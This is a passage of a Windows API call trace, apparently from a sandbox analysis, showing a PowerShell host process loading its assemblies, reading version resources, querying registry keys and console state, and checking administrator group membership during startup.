	[0106.565] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d67580 | out: lpData=0x2d67580) returned 1
	[0106.566] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dfa8, puLen=0x12dfa0 | out: lplpBuffer=0x12dfa8*=0x2d6761c, puLen=0x12dfa0) returned 1
	[0106.566] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d676f8, puLen=0x12df10) returned 1
	[0106.566] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0106.566] CoTaskMemAlloc (cb=0x2e) returned 0x20ce20
	[0106.567] lstrcpyW (in: lpString1=0x20ce20, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0106.567] CoTaskMemFree (pv=0x20ce20) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d6774c, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="System.Management.Automation") returned 28
	[0106.567] CoTaskMemAlloc (cb=0x3c) returned 0x216330
	[0106.567] lstrcpyW (in: lpString1=0x216330, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0106.567] CoTaskMemFree (pv=0x216330) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d677a8, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0106.567] CoTaskMemAlloc (cb=0x20) returned 0x212db0
	[0106.567] lstrcpyW (in: lpString1=0x212db0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0106.567] CoTaskMemFree (pv=0x212db0) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d677e8, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0106.567] CoTaskMemAlloc (cb=0x44) returned 0x216330
	[0106.567] lstrcpyW (in: lpString1=0x216330, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0106.567] CoTaskMemFree (pv=0x216330) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d67850, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0106.567] CoTaskMemAlloc (cb=0x76) returned 0x1a72a0
	[0106.567] lstrcpyW (in: lpString1=0x1a72a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0106.567] CoTaskMemFree (pv=0x1a72a0) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d678ec, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0106.567] CoTaskMemAlloc (cb=0x44) returned 0x216330
	[0106.567] lstrcpyW (in: lpString1=0x216330, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0106.567] CoTaskMemFree (pv=0x216330) 
	[0106.567] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d67950, puLen=0x12df10) returned 1
	[0106.567] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0106.567] CoTaskMemAlloc (cb=0x58) returned 0x16f310
	[0106.567] lstrcpyW (in: lpString1=0x16f310, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0106.568] CoTaskMemFree (pv=0x16f310) 
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d679cc, puLen=0x12df10) returned 1
	[0106.568] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0106.568] CoTaskMemAlloc (cb=0x20) returned 0x212db0
	[0106.568] lstrcpyW (in: lpString1=0x212db0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0106.568] CoTaskMemFree (pv=0x212db0) 
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x2d67674, puLen=0x12df10) returned 1
	[0106.568] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0106.568] CoTaskMemAlloc (cb=0x66) returned 0x211510
	[0106.568] lstrcpyW (in: lpString1=0x211510, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0106.568] CoTaskMemFree (pv=0x211510) 
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12df18, puLen=0x12df10 | out: lplpBuffer=0x12df18*=0x0, puLen=0x12df10) returned 0
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dee8, puLen=0x12dee0 | out: lplpBuffer=0x12dee8*=0x2d6761c, puLen=0x12dee0) returned 1
	[0106.568] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0106.568] VerLanguageNameW (in: wLang=0x0, szLang=0x1640a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0106.568] CoTaskMemFree (pv=0x1640a0) 
	[0106.568] VerQueryValueW (in: pBlock=0x2d67580, lpSubBlock="\\", lplpBuffer=0x12df38, puLen=0x12df30 | out: lplpBuffer=0x12df38*=0x2d675a8, puLen=0x12df30) returned 1
	[0106.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0106.717] CoTaskMemFree (pv=0x213e50) 
	[0106.741] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12de08 | out: phkResult=0x12de08*=0x304) returned 0x0
	[0106.746] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12ddf8 | out: phkResult=0x12ddf8*=0x308) returned 0x0
	[0106.746] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12de88 | out: phkResult=0x12de88*=0x30c) returned 0x0
	[0106.852] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ddcc, lpData=0x0, lpcbData=0x12ddc8*=0x0 | out: lpType=0x12ddcc*=0x1, lpData=0x0, lpcbData=0x12ddc8*=0x56) returned 0x0
	[0106.853] CoTaskMemAlloc (cb=0x5a) returned 0x2114a0
	[0106.853] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dd9c, lpData=0x2114a0, lpcbData=0x12dd98*=0x56 | out: lpType=0x12dd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dd98*=0x56) returned 0x0
	[0106.853] CoTaskMemFree (pv=0x2114a0) 
	[0106.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0106.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0106.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0107.036] CoTaskMemAlloc (cb=0x104) returned 0x213e50
	[0107.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x213e50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0107.036] CoTaskMemFree (pv=0x213e50) 
	[0108.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0108.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0108.763] CoTaskMemAlloc (cb=0x104) returned 0x2214e0
	[0108.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2214e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.763] CoTaskMemFree (pv=0x2214e0) 
	[0108.764] CoTaskMemAlloc (cb=0x104) returned 0x221510
	[0108.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.765] CoTaskMemFree (pv=0x221510) 
	[0108.792] CoTaskMemAlloc (cb=0x104) returned 0x221510
	[0108.792] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.792] CoTaskMemFree (pv=0x221510) 
	[0108.794] CoTaskMemAlloc (cb=0x104) returned 0x221510
	[0108.794] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0108.794] CoTaskMemFree (pv=0x221510) 
	[0109.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0109.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0109.946] CoTaskMemAlloc (cb=0x104) returned 0x221510
	[0109.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.946] CoTaskMemFree (pv=0x221510) 
	[0109.949] CoTaskMemAlloc (cb=0x104) returned 0x221510
	[0109.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221510, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.949] CoTaskMemFree (pv=0x221510) 
	[0110.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0110.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0114.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0114.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0114.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0114.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0115.445] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0115.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0116.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0116.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0116.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0116.912] SetErrorMode (uMode=0x1) returned 0x1
	[0116.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12dd60 | out: lpFileInformation=0x12dd60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0116.912] SetErrorMode (uMode=0x1) returned 0x1
	[0117.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12dbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0117.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0117.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0117.558] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.558] CoTaskMemFree (pv=0x221730) 
	[0117.562] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.562] CoTaskMemFree (pv=0x221730) 
	[0117.562] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.562] CoTaskMemFree (pv=0x221730) 
	[0117.565] CoCreateGuid (in: pguid=0x12e128 | out: pguid=0x12e128*(Data1=0x1f3cd22f, Data2=0xf8ae, Data3=0x45bd, Data4=([0]=0xaf, [1]=0xde, [2]=0x9, [3]=0x96, [4]=0xde, [5]=0x44, [6]=0xfb, [7]=0x4c))) returned 0x0
	[0117.568] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.568] CoTaskMemFree (pv=0x221730) 
	[0117.722] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.722] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.722] CoTaskMemFree (pv=0x221730) 
	[0117.725] CoTaskMemAlloc (cb=0x104) returned 0x221730
	[0117.725] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221730, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0117.725] CoTaskMemFree (pv=0x221730) 
	[0117.730] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0117.732] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12ddd0 | out: lpConsoleScreenBufferInfo=0x12ddd0) returned 1
	[0117.737] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0117.737] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12ddd0 | out: lpConsoleScreenBufferInfo=0x12ddd0) returned 1
	[0117.738] GetVersionExW (in: lpVersionInformation=0x12dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0117.741] GetCurrentProcess () returned 0xffffffffffffffff
	[0117.741] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12ddf8 | out: TokenHandle=0x12ddf8*=0x320) returned 1
	[0117.745] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dd18 | out: TokenInformation=0x0, ReturnLength=0x12dd18) returned 0
	[0117.746] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1738c0
	[0117.746] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x1738c0, TokenInformationLength=0x4, ReturnLength=0x12dd18 | out: TokenInformation=0x1738c0, ReturnLength=0x12dd18) returned 1
	[0117.751] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12de78 | out: phNewToken=0x12de78*=0x31c) returned 1
	[0117.753] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2e42328*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12de88 | out: IsMember=0x12de88) returned 1
	[0117.753] CloseHandle (hObject=0x31c) returned 1
	[0118.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
